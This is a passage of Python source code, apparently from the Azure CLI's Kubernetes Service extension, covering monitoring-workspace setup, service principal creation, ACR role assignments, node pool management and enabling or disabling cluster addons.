def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
logger.error(
"AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.cli.core.profiles import ResourceType
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except HttpResponseError as ex:
if ex.status_code != 404:
raise ex
else:
ResourceGroup = cmd.get_models('ResourceGroup', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
resource_group = ResourceGroup(location=workspace_region)
resource_groups.create_or_update(default_workspace_resource_group, resource_group)
GenericResource = cmd.get_models('GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _sanitize_loganalytics_ws_resource_id(workspace_resource_id):
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
return workspace_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
for key in list(addon.config):
if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip(
)
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except HttpResponseError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
_ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon in [CONST_MONITORING_ADDON_NAME, CONST_AZURE_DEFENDER_ADDON_NAME]:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID if addon == CONST_MONITORING_ADDON_NAME else CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError(f'The {addon} addon is already enabled for this managed cluster.\n'
f'To change {addon} configuration, run "az aks disable-addons -a {addon}"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {
logAnalyticsConstName: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
